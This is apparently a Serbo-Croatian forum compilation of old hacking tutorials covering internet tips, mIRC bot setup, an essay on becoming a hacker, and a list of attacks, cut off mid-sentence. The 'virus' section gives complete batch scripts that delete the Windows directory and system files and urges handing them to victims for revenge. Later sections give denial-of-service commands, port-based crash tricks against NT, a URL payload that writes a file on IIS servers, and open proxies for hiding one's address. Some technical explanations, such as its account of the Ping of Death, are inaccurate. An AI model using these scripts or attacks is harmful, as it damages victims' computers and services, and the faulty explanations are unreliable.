Internet Fazoni Pravljenje Virusa miRC Hack Kako postati HACKER ?

Hackanje Hack Web Hackanje Sifre putem ftp. Dos Hackanje Crackanje Windows Trikovi

Dr.Rame

-*-*-*--- Hakerski internet fazoni --*-*-*

* U ovom tutoru mozete naci neke veoma korisne fazone preko interneta. Neke takodjer mozete iskoristit u hakerske svrhe uglavnom to vi odlucite. * Access denied (nekoj web stranici) Zelite li da sprijecite pristup nekoj web stranici sa vaeg kompjutera? Editujte fajl HOSTS.SAM koji se nalazi u Windows folderu. Poto je 127.0.0.1 vaa IP adresa, otkucajte adrese sajtove koje zelite da zablokirate za ovaj IP. * Anonimnost na internetu Identifikacija poziva je sjajna stvar, zar ne? Medjutim, kada se logujete na Internet, va Internet provajder ce, ukoliko posjedujete "tonsku" centralu, zabiljeziti broj telefona sa kojeg ste zvali to moze u nekim slucajevima da bude nezgodno. Ako vam se ovo ne svidja, dodajte ispred broja telefona vaeg provajdera broj "*72#" (bez znaka navoda) i va broj telefona ce biti sakriven! Naravno, ova funkcija radi i kada zovete bilo koji broj putem fiksnog telefona. Napomena: nije provjereno na svim "tonskim" centralama * Brisanje URL adrese u IE Ukoliko zelite da izbriete URL adrese u Internet Exploreru koje se pojavljuju u Address baru morate podesiti bazu registara. Idite do HKEY_CURRENT_USER \ Software \Microsoft \ Internet Explorer \ TypedURLs i tamo obriite nepozeljne stavke. Putanja za Windows 2000 je HKEY_USERS \ S-1-521...\Software\Microsoft\InternetExplorer\TypedURLs * Fazon u Outlook Express-u Kada ubacujete mail attachment u Outlook Expressu, dijalog box vas uvijek vodi u neki folder u kojem,

naravno, nikad nije fajl koji zelite da 'zakacite'. Ako zelite ovo da promijenite uradite slijedece. Idite sa Regedit.exe na HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows \CurrentVersion \ Explorer \ User Shell Folders. Kliknite dvaput na Personal key i otkucajte putanju vaeg omiljenog foldera. Restartujete OS. * Combine and Decode u Outlook Expressu Znate li za opciju Combine and Decode u Outlook Expressu? Selektujte vie poruka drzeci CRTL ili SHIFT i idite do Message menija i stavke 'Combine and Decode...'. Dobit cete od svih selektovanih poruka jednu veliku poruku koju npr. mozete da tampate ili neto slicno. * Prevodjenje IP adrese Ukoliko zelite da na najlaki nacin, bez upotrebe raznih shareware-ova, prevedete IP broj (npr. 245.84.120.19) u neto razumljivo i pamtljivo, idite u DOS i otkucajte NSLOOKUP [IP] * Vas IP? Da li zelite saznat vasu IP adresu kada se konektujete na internet? Otidjite u MS-DOS, i u Windows folderu utipkajte: IPCONFIG c:\windows\ipconfig P.S. "Naravno ove fazone nisam ja otkrio, nego samo sakupio i ponesto jos dodao (objasnio itd...)

Pravljenje Virusa

Upoznavanje Dobro doli u jo jedan tutorial by BaCkSpAcE. Ovaj tutorial moe Vam pomoi da pravite jednostavne viruse. Ovdje neu priati on nekoj naprednoj tehnologiji jer je ovaj tutorial za poetnike. Pa ako ste "elite haker" ne gubite ovdje vrijeme kad moete obarati sistem Micro$oft-a. hehe... Ovaj tutorial govori o jednostavnom brisanju fajlova. Pa ako ste se nadali da ete unititi svijet, ao mi je ovaj tutorial nije za tebe.

DOS batch virusi -su virusi koji se zavravaju sa ekstenzijjom .bat. Mogu sadravati DOS komande. Da se malo vratimo kada je KISS vladao svijetom, DOS je bio savreni OS. DOS nije ni malo slian Windowsu pa ga nije lako koristiti. Zato je Micro$oft mali mini-jezik nazvan "batch file". Batch fajlovi su fajlovi koji sadrze komande koje e kompjuter slijediti. I ako kaemo da izbriemo itav harddisk on e posluati naredbu. SAda, jezik je neto najlake to treba nauiti na putu da postane haker. Samo treba da ima talenta. Sada treba da naui komande, ja u neke izlistati ovdje: Najkorisnije komande su:(molim Vas otvorite jo jedan notepad ili word pad i zapiite komande jer e Vam kasnije trebati) @echo off - ova komanda e rei kompjuteru da ne pokazuje sve to radi u datom trenutku. Dobro ako ne elite da user sazna ta program radi. echo text ovdje - ova komanda e izbaciti rijei text ovdje na ekran. Recimo ako elite da stavite "ti papcino" na rtvin ekran, onda bi napisao echo ti papcino Lagano, zar ne? cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u veini sluajeva C:\). Veinu vremena ete koristiti ovo. Kasnije ete vidjeti zato.

cd direktorij - ovo otvara direktorij. Pa recimo da ste tipkali komandu cd\ prije. Sada ste u c:\ zbog cd\ komande, jel tako?Onda recite kompjuteru cd windows i tada e kompjuter otvoriti direktorij windows sa c: drajva. (c:/windows, znate, najvaniji direktorij osim ako nemate linux.) RD direktorij - ova komanda e izbrisati direktorij. Ovo je teko objasniti. Ako ste na c:/windows, i koristili ste komandu RD windows E pa nee raditi glupko, zato to direktorij windows nije u direktoriju c:/windows/ . Jedini nain da ovo radi jeste da budete u c:\ . Zato to je direktorij windows u c:\ . Nadam se da se niste izgubili ili zbunili. Ali ovo je teko objasniti potpunim poetnicima, jer ako koristite windows ve neko vrijeme ovako jednostavne komande bi trebali kopati. Ako jo ne shvatate poaljite mi email: backspace_np@yahoo.com pa u Vam pokuati detaljnije objasniti. @del fajl - ova komanda brie odredjeni fajl u odredjenom direktoriju pa ako ste npr u c:/windows/ bilo koji fajl mozete izbrisati kao npr. @del logo.sys End - ova komanda zavrava i izlazi iz programa.

Sada kada znate osnovne komande moemo krenuti sa uenjem kako da ih pretvorimo u viruse. Ja mislim da ljudi najbolje ue ako imaju primjer ispred sebe. Pa u ja zato koristiti primjere.

Primjer br.1 --------------@echo off cd\ rd windows echo TI glupane echo hahahahhahaha echo imam te echo Vidimo se echo Vozdrica end --------------

Hajmo sad ovo analizirati: @echo off - govori kompjuter da ne izbacuje sve na ekran tako rtva nita nee znati ta se deava. hehehe cd\ govori da se pomjeri u c:\ drajv. rd windows - govori da deletuje direktorij windows iz c:\ . I to znai vozdra Windows. hahaha Ostale komande echo TI glupane....govore kompjuteru....pogodite ta. End -zavrava program. Do sada bi trebao da shvati kako ovi virusi rade. Ali samo zato to je na tim velikoduan dat u Vam jo jedan primjer. Primjer br.2 -------------------@echo off cd\ cd windows @del win.com @del win.ini echo Pokuaj sad popravit kompjuter, -Mi u Boga vjerujemoEnd ------------------Analiza virusa: @echo off - govori kompjuteru da bude miran cd\ - govori kompjuteru da ide na c:\ cd windows - govori kompjuteru da ide sa c:\ na c:\windows @del win.com - govori kompjuteru da izbrie win.com iz direktorija windows @del win.ini - govori kompjuteru da izbrie win.ini iz direktorija windows echo Pokuaj sad popravit kompjuter, -Mi u Boga vjerujemo- Ako ne zna ta znai sad me ubij End - kraj Nadam ste da ste zapisali osnovne komande u notepad ili ta ve. Sada je vrijeme da saznate kako da sauvate fajl, zar ne? Pa to je lako. U Notepadu ete da kliknete na File> Save As> ukucajte ime fajla koje Vi sami elite ali da na kraju upiete .bat (Npr. mojprogram.bat mojvirus.bat klikni.bat itd itd) I onda ga posaljite na web ili ga dajte svojoj rtvi on to treba da uradi jeste da ga pokrene i on je gotov. UPOZORENJE: Nemojte sa ovim jednostavnim virusima neke vee kompanije uznemiravati jer ste onda nadrljali. I ako Vi pokrenete taj svoj virus onda ste vi nadrapali. Bilo kako bilo ovo je kraj ovog tutoriala. Nadam ste da ste uivali itajui ga. Ja sam se zabavljao dok sam ga pisao.

Ovakve stvari, virusi bi trebali biti koriteni samo za osvetu.

miRC

E pa ovako da krenemo od samog pocetka ... znaci skinete miRC sa adrese http://www.mirc.com/get.html zatim instalirate ... startujete idete na options (2 ikonica gore) Zatim, /connect/add ... prvi red je "Description" tu upisite samo ime servera il' sta hocete sve jedno ... IRC Server (na kraju cu napisati listu svih YU i jos ponekih irc servera za koje znam) Port - obicno je 6667 group nista .. pass. - nista - add : ) i samo connect to IRC server. Kada ste se povezali na server kucate /list da vidite sve kanale ... kliknete dva puta na zeljeni kanal i tamo ste ... komnda za ulazak na neki kanal je "/join #kanal" ... =) E,sad idemo na ono ... Kako da instaliram bota ? : ) E,pa ovako ... da bi doveli bota na IRC morate da imate shell koji podrzava EggDrop ... odma' zaboravite na one free shell-ove jer od toga nema nista ... vec nabavite nekako ... npr idite na irc.dal.net #shell #shellx #shellz pa trgujte malo (retko ko nije prevarant) ; ) www.egghelp.com ... skinite EggDrop koliko ja znam poslenja je EggDrop1.6.6 ... a po meni najbolja 1.4.5 verzija : ) Onda raspakujte eggdrop u neki direktorijum i sredite fajl "eggdrop.conf" pod ovo "sredite" podrazumevam: Nick Bota,Realname,Server,ako hocete neku scriptu da dodate kao sto je "bseen" ... i jos neke gluposti ... ako ste bas lame posaljite mi mail i poslacu vam sredjen conf file : ) Kada ste nabavili shell nakacite se na FTP ... host - host shell-a - user pass ... ma sta vam pisem ovo to valjda znate? : ) Nakacili ste se na shell ? prebacite EggDrop1.4.5.tar.gz na shell Idite u Start/run pa kucajte telnet : ) onda na connect/remote system i tu upisete host shell-a i port : ) Ako je sve cool onda cool : ) kucajte ovako ... tar zxfv eggdrop.1.4.5.tar.gz (kompajlira) nakaci se na ftp i prebaci "eggdrop.conf" u direktorijum "eggdrop1.4.5" vrati se na telnet i kucaj "cd eggdrop1.4.5" zatim ...

./configure make make install ./eggdrop -m eggdrop.conf.dist Nakacite se na server na kome je bot i kucajte /msg BOTnick hello onda ce on tu nesto smara da si ti owner itd ... onda setuj pass /msg [botnick] pass "tvoj pass" ... kucas /chat [BOTnick] ... trazice ti pass .... I TO JE TO : ) osnovne komande na botu ... Dodavanje usera - .+user Brisanje user .-user [Nick] Dodavanje hosta .+host [nick] [host] Ako hoces da dovedes bota na neki kanal kucaj .+chan #kanal A da zaboravih gore da napisem .. dodavanje flagova ... op - user, m master, n - owner, a - auto op dovoljno za sada ... dodavanje flagova se vrsi komandom .chattr [nick] +[jedan od navedenih gore] TO ti je dovoljno za sada detaljnije upustvo ces dobiti na adresi www.egghelp.com aaa vec mi je muka ... sad idemo na instaliranje BNC-a : ) znate ono 24h dnevno vas nick na irc-u : ) yeah : ) Logujete se na shell ... kao ono za bota : ) i kucate "lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz" on ce ga tu downlouduje Dalje kucate ... tar -zxvf psyBNC2.2.1.tar.gz cd psybnc make make menuconfig make i ./psybnc pokrecete BNC i sve je spremno ... ukljucite miRC i konektujete se na server i port koji ste setovali KAKO SAKRITI IP ?! Ukljucite miRC/options/Firewall ... chekirate "Use SOCKS firewall" Protocol - Socks4 | Host - AAubervilliers-101-2-1-63.abo.wanadoo.fr | userID - nista | pass - nista | port - 1080 | evo jos nekih koji rade po istom principu ... host - mail.bias.bm | port - 1080 host - 212.136.228.242 | port - 1080 host - server1.scottsbluff.sykes.com | port - 1080 ... NickServ,ChanServ,MemoServ,SeenServ ... .. Blah ovo je po meni shit ... bilo je bolje dok nije bilo chanserv-a .. ono dobijes op ... TakeOver ubacis bota i ql ; ) ali sta je tu je : ) Evo nekih osnovnih komandi koje bi trebalo da znate na BalcanNet-u ... /msg nickserv register [pass] [email] - registrovanje nick-a

/msg chanserv register [#kanal] [pass] [opis kanala] - registrovanje kanala /msg chanserv access [#kanal] add *!*ident@* [level] - dodavanje access-a /msg memoserv real all - citanje poruka /msg seenserv seen [nick] - seen Evo nekih servera : BalcanNet irc.drenik.net irc.yubc.net - po meni najbolji irc.verat.net irc.rstel.net irc.studio-b.co.yu irc.planetarion.co.yu ima ih jos dosta al mislim da su ovi najbolji ... a da, portovi servera je 6667 ... hmm koji jos znam ... ? a da ... irc.krstarica.co.yu:6667 irc.cg.yu:6667 irc.tehnicom.net:6667 irc.miss-serbia.com i najveci irc.dal.net ... irc.tupacforum.com:6667 irc.zmajevi.net:6667

Kako postati HACKER!

Ovaj tekst nisam ja napisao nego "drakelord" ja sam ga samo prepisao na forum jer je DOBAR Gotovo svaki put, kad surfam webom, ircam, citam usenet ili slicno, naidem na ljude koji razgovaraju o hakiranju, hakerima, sigurnosti i slicnim temama. Svi novi (newbie) clanovi 'hack-scene' ele u biti znati kako postati hackerom i ele to uciniti brzo. Stoga, ostvarujuci tu elju ( koja je, vjerujem, nikla kad je doticni 'novak' gledao neki film na temu hackera, citao u novinama ili sl. ) prolaze kroz mnoge komplikacije, primjerice: - na ircu, usenetu, forumima postavljaju mmnoga pitanja od kojih su neka glupa (Kako da haknem Hotmail?) i neka pametna (Gdje da

nadem podrobnije informacije o strukturi TCP/IP skupine protokola?). - cesto niti ne uce programirati, a vec kooriste eksploite koje niti razumiju, niti znaju zato ih koriste i sl. - puno puta egoizam prevlada pa se dogode izgredi (svade s iskusnijim korisnicima racunala), najcece na ircu i slicnim servisima gdje se odvija 'real-time' direktna komunikacija - zbog osobnih razloga koriste Denial-of-sservice alate i cine nepotrebnu tetu (ne znajuci niti kako je alat napisan i to eksploatira) Prilikom tih komplikacija se cesto ponize pa promijene nadimak, e-mail adresu i slicno. Ovaj tekst bi vjerovatno trebao reci 'novacima' to ciniti da se komplikacije ne dogadaju. Izraz 'hacker' oznacava osobu koja uci jer VOLI uciti o racunalima. U mojem rjecniku, 'hacker' znaci isto to i 'majstor od zanata'. Majstor nekog zanata radi svoj zanat tako dugo dok ga ne dovede do savrenstva. U smislu hackera, to je osoba koja uci o nekom podrucju racunalne znanosti tako dugo dok to podrucje ne dovede do savrenstva. Dakle, da je u teoriji i praksi u tome postigao svoj maksimum. Hakiranje se odnosi na aktivnost postizanja tog savrenstva. Izraz 'hacker' se cesto vee uz racunalnu sigurnost, no to ne mora biti. Moe se vezati uz bilo koje polje racunalne znanosti - grafika, programiranje, poslovna informatika, administriranje, itd. Svaki hacker spoznaje nove tehnike i vjetine na svojem polju djelovanja (npr. sigurnost). Te vjetine prenosi na osobe koje su manje iskusne ili pocetnike (npr. napie tekst o tome to je novo spoznao, a da to drugi u njegovom polju djelovanja ne znaju). To ga cini onim to jest hackerom (npr. 'majstor racunalne sigurnosti'). Od stecenog znanja, osoba mora imati i neke koristi - inace to znanje ne slui nicemu. Ako se uci samo zato da se voli uciti, a nema ama ba nikakve koristi od stecenog znanja, onda se vrijeme i trud troe na krivo! Stoga, ako se uci bez veze, bez odredene i jasne svrhe, osoba ne moe biti majstor niti hacker. Primjerice: - Tim Backstone uci o racunalnoj grafici. Svaki dan spoznaje nove vjetine crtanja raznih oblika. On uci zato jer ocekuje da ce svojim znanjem imati financijsku korist. - Gerald Winston je vec zaposlen kao Windoows programer. On uci o UNIX sigurnosti u svoje slobodno vrijeme. Svrha njegovog ucenja je da povisi reputaciju, tj. da njegov doprinos bude zabiljeen u javnosti i da njegovo ime bude poznato ire nego vec jest, a to ce uciniti piuci tekstove i savjetujuci korisnike UNIXa. - Ivo Ladic je srednjokolac. Polazi matemmaticku gimnaziju. Njega fasciniraju kriptografski sustavi pa ih vjerno proucava. Posjecuje forume i dopisuje se s ljudima koji se bave kriptografskim sustavima. On to radi jer se nada da ce tako dobiti posao u buducnosti. - Mica Kurtovic je takoder srednjokolac. Polazi u opcu gimnaziju. Njega zanima racunalna sigurnost i hackeri. On eli postati hackerom jer eli haknuti mnogo servera i postati slavan medu hackerima. Svi primjeri su izmiljeni, no, ocito je da Mica cini neto krivo.

On od 'hakiranja' servera nece imati nikakvu korist, a kamo li slavu. Bit ce otecen: - financijski (mrena oprema, mnogo potroenih impulsa...) - emocionalno (agresivnost i egoizam ce ojjacati) - socijalno (drutvo ce ga zanemariti, izggubit ce dosadanje prijatelje, a nove ce teko steci) - 'reputacijski' trait ce ga MUP, FBI, Innterpol... a to ovisi o aktivnostima (koje bi vjerovatno bile ilegalne) Stoga, dragi moji lameri, newbaji, rookiji i svi koji elite postati hackerima, citajte me paljivo. Ako elite biti hackerom (na podrucju racunalne sigurnosti najcece), cinite ovako: 1. budite SIGURNI da to elite 2. VJERUJTE da to moete 3. OCEKUJTE korist od svoje aktivnosti i rada (financijska, socijalna - novi prijatelji, reputacija - da postanete poznatiji, kao primjer drugima ili slicno, ...) 4. NADAJTE se da ce se ono to ocekujete ispuniti 5. USTRAJTE u toj aktivnosti jer treba vremena i truda da se postane hacker, odnosno 'majstor' Sav materijal koji vam je potreban da postanete hacker moete nabaviti tako da pitate starije hackere. Primjerice, za racunalnu sigurnost na podrucju UNIX-a idete, npr. IRC: irc.dal.net:#unix: Molim vas lijepo, gdje da nadem informacije o racunalnoj sigurnosti na podrucju UNIXa. elio bih nauciti to je vie moguce o tome pa pitam vas koji znate vie od mene. Ne bojte se reci da ste novi, da ne znate. Ako priznate da ne znate, UVIJEK ce vam netko pomoci ako ELITE da vam se pomogne. Kineska poslovica kae: "Kad je ucenik spreman, pojavi se ucitelj." Takoder, morate znati jo neto vano, a to je razlika izmedu inteligencije i pameti. Inteligencija je onaj dio vae osobe koji omogucuje bolje, bre pamcenje informacija. Taj dio vam omogucuje da skupite mnogo podataka o podrucju o kojem elite uciti. Inteligencija je ono to vam je UROENO, to ste genetski nasljedili. Pamet (emocionalna inteligencija) se stjece od rodenja, a na razvoj pameti utjece okolina (knjige, roditelji, prijatelji, baka, vrijeme, rat, tuca, plac, svade, smijeh, seks...). Pamet covjek moe mijenjati, buduci da na nju utjece okolina, a to cini tako da mijenja okolinu, npr. ako je dosad bio izloen loem utjecaju drutva i sam je bio alkoholicar, on odlucuje prestati uzimati alkohol, mijenja prijatelje, posao, stan i sl. samo da bi promijenio (unaprijedio) svoju pamet. Dakle, pamet se odnosi na 'spozaju svojih osjecaja' (zato se zove *emocionalna* inteligencija).

*** Zato je to vano u postajanju hackerom? *** Vi morate imati oboje da bi postali hackerom. Morate imati INTELEKT da bi upili potrebno znanje i morate imati PAMET da bi znali da to elite, moete, da ste spremni preuzeti odgovornosti koje aktivnost kojom se elite baviti donosi, itd. Ovo sam spomenuo jer mnogi vide ZERO_COOLa ili NEA s Matrixa i poele biti 'hax0r'. Ne-ne! Prvo, PAMET U GLAVU, a onda da vidite da li ste spremni na ono to vam ta aktivnost koju ste izabrali donosi. Na snove, zamiljanja o ruenju servera, slavi koju cete dobiti, filmove, MTV spotove, razgovore na IRCu i forumima i sl. se NE OSLANJATI. U obavljanju pravog posla cesto nema radosti, no treba je biti. Posao je napor i zato je veoma vano da birate ONO za TO STE SPOSOBNI. U svakom poslu ima padova i uspona. Shvatite svaki pad kao korak blie uspjehu/rjeenju. Problemi su izazovi, a poslom se izazovi prihvacaju. Koliko elite prihvatiti izazov i raditi? Koliko moete? Da li ste uopce sposobni za to? Razmislite jo jednom. Vi birate! "Znanje je poput kamena. Kamenom se mogu napraviti velike stvari ako ga dobro *upotrijebite*."

Hackanje
SADRZAJ: -----------------1. Con, Aux i Nul Exploit (by BaCkSpAcE) 2. SYN Flood Attack (by BaCkSpAcE) 3. Ping of Death (by BaCkSpAcE) 4. Exploit za NT 3.5x rachunare (by BaCkSpAcE) 5. Malo o NT

(by Perun) 6. Stvaranje backspace.bat fajla na serveru (by BaCkSpAcE) 7. Apache HTTP Server - Exploit (by Zeroo_Cool, modified by BaCkSpAcE) 8. PHP Path Revealing Vulnerability (downloaded from Rootshell, translated by BaCkSpAcE) 9. Sakrivanje IP broja u mIRCu (by BaCkSpAcE} 10. Trik u SoftICE za crackere koji nisu znali (by BaCkSpAcE) =============================================== ========= 1. Con, Aux i Nul Exploit -----------------------------------------< Ovi exploiti provereno rade na Win98 i Win98 SE ali u WinME ne rade. Oni se javljaju pri ukucavanju sledecih komandi: c:\con\con ili c:\aux\aux ili c:\nul\nul Nakon ovoga rachunar ce da se zamrzne i jedino reshenje bice rebootovanje rachunara. Moze da se koristi npr. za Web, tako shto napravite hiperlink do npr. c:\con\con i kada korisnik pritisne na to rachunar se zaledi ili slichno. Reshenje problema je skidanje zakrpe sa Micro$oftovog sajta ili da predjete na Linux, ako to vec niste uradili. =============================================== ========= 2. SYN Flood Attack --------------------------------Shta je to SYN Flood Attack? To je ustvari jedna vrsta Denial of Service napada.Syn Attack radi tako shto napadach shalje zrtvi Syn Request da se konektuje na server zrtve, a zrtva odgovara sa ACK, i rezervishe buffer (mesto u memoriji) za tu konekciju. Napadach neodgovara sa ACK nego shalje SYN Request ponovo, i zrtva ponovo odgovara sa AK i odvaja buffer i sve tako dok zrtva neostane bez Buffer Space i krashira se. Ovom vrstom necete naneti skoro nikakvu shtetu WebMasteru. On ce morati, posle SYN Flood Attacka, da rebootuje rachunar. NT je po defaultu podeshen da shalje SYN-ACK na 3,6,12,24 i 48-oj sekundi. Posle slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da

dealocira prostor koji je bio zauzet. Znachi napadach ima fore ukupno 3+6+12+24+48+96 = 189 sekundi. =============================================== ========= 3. Ping of Death ---------------------------Ping of Death je isto jedna varijanta Denial of Service napada. Izvodi se tako shto cesh da otkucash 'ping adresa -n 9999999' i uz to treba da nadjesh rachunare sa brzim linijama.Tako su gospoda koja je napala yahoo.com i uradila.Uzeli su par mocnih kompjutera na brzim linijama sa Stanford univerziteta i uradili 'ping www.yahoo.com -n 9999999' i onda je ta linija kojom se ulazi u Yahoo bila zakrchena velikom kolichinom podataka (skoro milion pingova) i niko nishta nije mogao uraditi.Naime, kada se otkuca ova komanda, onda server pochinje da obradjuje te podatke.Ali poshto je tu ima puno podataka server ce da dugo dugo radi.Ali ako je to neki slabiji server(mislim na neke klasu ispod Yahoo), onda ce taj rachunar zablokirati(mozda se chak i sam resetuje!).Znachi kod slabijih rachunara se dogodi Buffer Overflow zbog kolichine podataka vece od njegovog buffera, ali Yahoo je jachi.Izashao je i patch za vecinu ugrozenih sistema koji onemogucava Efekat Ping of Deatha. =============================================== ========= 4. Exploit za NT 3.5x rachunare ----------------------------------------------------a) Ako u toku rada DNSa telnetujete se na port 53 i ako ukucate 10 ili vishe znakova i pritiskom na enter, DNS ce se zaustaviti. b) Ako se u toku konekcije na Port 135 telnetujete i ukucate 10 ili vishe znakova i pritiskom na enter, onda ce se korishcenje procesora popeti na 100%, shto znatno usporava performanse sistema. c) Ako se telnetujete na port 1031 i ako ukucate 10 ili vishe znakova i pritisnete enter, onda ce se IIS zaustaviti. d) Telnetovanjem na port 80 i ukucavanjem 'GET ../..' takodje ce zaustaviti IIS. =============================================== ========= 5. Malo o NT --------------------------------------------------------------

NT koristi jedan na objectima zasnovan model obezbedjenja sto znaci da se svaki fajl posebno moze obezbediti na serveru. Model obezbedjenja u NT-u se sastoji iz cetiri dela: 1 Local Securitu Autority 2 Security Account Manager 3 Security Reference Monitor 4 User Interface -UI NT koristi Server Message Block za kontrolu slanja podataka. OS od NT ima jedan poseban security nivo I zbog toga on podrzava vise security-interface-a. Glavno pravilo kod obezbedjena NT sistema je -koristi zdrav razum (kao na primer fizicko obezbedjenja servera ). Ovde je bitno naglasiti da NT ima C2 certifikat Americkog Ministarsva za odbranu samo kao stand-alone machina -bez diskete-drajva I neprikljucen na mrezu. NT je prilicno zatvoren sistem ali ima jedno par slabosti koje hakeri obicno koriste ; Na primer shares - deljene particije direktorijumi I fajlovi: - Ako kao administrator delite mape tako dda user Pera ima kontrolu nad njima ,user Pera moze dalje da kontrolose direktorijume I mape na kojima ima dovoljne privilegije sto postane prilicno nezgodno ako user Pera vise nije pravi user Pera neko haker koji je na jedan od mnogobrojnih nacina preuzeo njegiv identitet.Zato je potrbno da se svaki share explicitno definira I ne prihvataju defaul configuracije NT-a jer one omogucavaju malicioznom useru da npr. "hanguje" sever pod oderdjenim okolnostima - Ako haker na jedan ili drugi nacin dobijje fizicki pristup serveru on moze restartovati server sa DOS disketom I sa ntfsdos.exe jedne Microsoftove aplikacije dobiti pristup na sve fajlove na serveru ili radnoj stanici server - bez bilo kakve brige o priveligijama pravima na njima ..Takodje ako ima CD-ROM sa Linoxom na njemu od moze da potuno over-raiduje obezbedjnje Servera iz Linuxa tako da mu uopste nije potreban Administratorov ili bilo ciji drugi password. Naredna slabost je kod davanja Full controll prava userima - jer pod tim se podrazumeva jedno skriveno pravo koje se zove File Delete child I koje je neizbrisivo iz Full control privilegija.Sa tim pravom user moze da brise read-only files sto moze da bude prilicno nezgodno ako su ona kljucna za funkcuionisanje NT OS. Jedna od najvaznijih stvari kod NT obezbedjnja je obezbediti grupu Administratora. Posto clanovi ove grupe imaju neogranicenu kontrolu, haker ce prvo pokusati da provali ovaj racun Ukoliko je on suvise dobro obezbedjen haker ce pokusati da provali racun sa manjim privilegijama a onda sebe doda grupi administratora (acces-promotion ili t.z.v. step-up attack). Jedan od najboljih nacina je sve clanove grupe administratora prebaciti u novu grupu I njoj dati potuna prava (pod drugim imenom) a onda izbrisati ili ograniciti prava grupe administratora tako da haker nece znati kojoj grupi I pod kojim imenom mora pripadati da bi dobio prava administratora. Klasican napad krakera zapocinje time sto ce

sebi pokusati da pribavi password on nekod racuna koji nije toliko vazan (I obezbedjen) a kasnije pokusati sebe da promovira u racun sa vise privilegija.Za ovo se koriste t.z.v. brute-power sistemi I programi koji su nabavljivi djabe na Internetu I koji mogu da u roku od 7 dana na prosecnoj machini krakrraju passworde I do 16 znakova dugacke. Za ovo haker mora da dodje do cipherteksta u password fajlovima Ikoji se cuvaju na serveru u Sam fajlovima I za koje mora da ima fizicki pristup serveru ili njegovoj fizickoj kopiji (rezervni serveri - shadow sistemi) I tu dolazi vaznost fizickog pristupa serveru u prvi plan. Takodje ukljucivanje funkcije Account lockout otezava posao hakeru (ali I administratoru ako je configuriran na premali broj pokusaja pa dobija non stop telefoncice od trapavih usera koji su se zakljucali pogresnim tipkanjem passworda) takodje I cool-out preiod ne sme biti previse dug jer haker to moze da koristi za t.z.v. denial of service napade. Takodje dobar racun-policu je na mestu, cesto menjanje userovih passorda I prisiljavanje usera da koriste passworde od najmanje 8 znakova I sa ukljucenjem brojeva ,znakova itd kao I koriscenje bezbednisnih programa kao KSA (Kane security monitor) umanjuju rizik od ovakvih napada. Zbog toga sto se standardno ne moze ukluciti Account -lockout za Administratorov racun on je jako ranjiv za ovakve vrste napada .Tu postoji par trikova da se to izbegne kao davanje drugog imena administratorovom racunu kao prethodno objasnjeno I onda pravljenje novog usera sa imenom administrator u dodavanjem njega grupi guests pa mu onda udaris jedan veoma dugacak password I onda ukljucis audit (koji ne postoji za administratora) I inda gledas sta se desava I ko sve pokusava da provali (mamac) "administratorov" racun. Takodje I zabranjvanje administraturu da se loguje preko networka nego samo direktno sa konzole umanjuje rizik. Iskljucivanje racuna Guest je takodje preporuka jer preko njega haker moze da dodje do vaznih fajlova u registry pod bilo kojim racunom I passwordom.To mu daje veoma siroka prava I ne samo citanje veoma vaznih fajlova (kao na primer password fajlova) vec I menjanje osobina fajlova (npr notepad.exe u haker.exe) kao I pristup veoma vaznim kljucevima (HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE itd ..kao I ubacivanje Trojanaca na ovaj nacin koji mogu raditi gotovo sve kao na primer slanje password fajlova pri restartovanju servera... Sto se napada sa networka tice najvaznije su slabosti koriscene kod SMTP i HTTP protokola.Zato se bitno da ovi protokoli imaju samo pristup (na user-nivou -onim fajlovima ili direktorijumima koji su neophodni za njihov rad).Takodje I svi TCP/UDP portovoi izmedju 135 I 139 treba da budu zacepljeni u vezi sa odbranom od napada obaziranih na Secure Message blocks) Narocito kod networka koje koriste SAMBU za komuniciranje sa Unix hostovima i serverima. Stavljanjem Web servera koji imaju vezu sa internetom na poseban subnet zasticen firewallom kao I koriscenje internih firewallova za poverljive servere je jako preporucljivo. Applikacije kao Alerter i Messanger kao i koriscenje LAN Menadjera su potencijalne security rupe jer koriste sisteme obezbedjnje koji su jako slabiji od NT-ovok standardnog nivoa. Na CD-romu na NT4.0 Microsoft je greskom postavio program rollback.exe kojemu je namena bila da pomogne administratorima da rediguju podatke u registriju ali umesto toga

brise sve u njemu.Najbolja opcija je izbrisati ovaj fajl ili u najmanju ruku promeniti mu ime u nesto nepogodivo da bi se izbegla zloupotreba od hakera. Ukoliko imate masinu sa dual-butom (Unix, OS2, Novel ) virusi koji napdaju boot-sektor preko ovih drugih OS-ova imaju uticaj i na NT (Obicno dobijas nesto kao :Boot device nor accesible). Takodje u SAMBA okruzenju sve r (remote) komande trebalo bi biti iskljucene (rlogin,rsh,remsh, itd ). Ukoliko se NT sever koristi kao FTP server bolje je koristiti FTP od IIS 4.0 jer je bolje zasticen nego standardni ftp od NT-a. Pri koriscenu RAS-a treba imati u vidu da RAS sifruje samo password sa MD4-hash funkcijom (koji moze biti snifovan) ostali podaci putuju networkom nesifrovani. Ukoliko haker provali password a RAS server je povezan u domain network on onda ima pristup celom domainu.Zato treba RAS uvek izolovati na poseban firewallon zasticen network od ostatka LAN-a. Zbog toga su i aktiviranje audita, verifikacije,sifrovanja,call-back funkcije nephodno radi zastite networka, specijalno u produkcionim sistemima i sa sistemima sa osetljivim informacijama. FTP i Telnet passwordi putuju nesifrovani networkom jer ovi protokoli ne podrzavju ovu funkciju. Posto vecina usera koristi iste passworde i za logovanje na domeinu neophodnoje sa user-policy prisiliti usere da koriste razlicite passworde za ovu namenu. Sto se tice ranjivisti TCP/UDP protokola kod NT-a to prilicno OK osim ranjivih portova od 135-139 koji mogu da se koriste za denial-of-service napada kojom haker zeli da postigne neke od sledecih rezultata: - Aktiviranje trojanca kojeg je ranije posstavio I koji postaje aktivan tek posle reboot-a - Maskiranje hakerskih aktiviteta (snifovaanja, previsok-procenat ACK paketa u networku, neobicno ponasanje procesora,) 3 =============================================== ========= 6. Stvaranje backspace.bat fajla na serveru ------------------------------------------------------------------------Ugrozene su verzije 3.5x i NT 4.0 bez odgovarajuceg Service Packa (ne secam se tachno koji sp je potreban). Posle ukucavanja: www.server.com/scripts/script_name%0A%0D>PATH\backspace.bat stvorice se jedan prazan fajl backspace.bat na tom serveru. Resenje je instaliranje odgovarajuceg sp-a na taj rachunar sa WinNT. =============================================== ========= 7. Apache HTTP Server - Exploit ------------------------------------------------------Ako upishemo u nash browser Url koji ce u sebi da sadrzi preko hiljadu '/', onda cemo dovesti 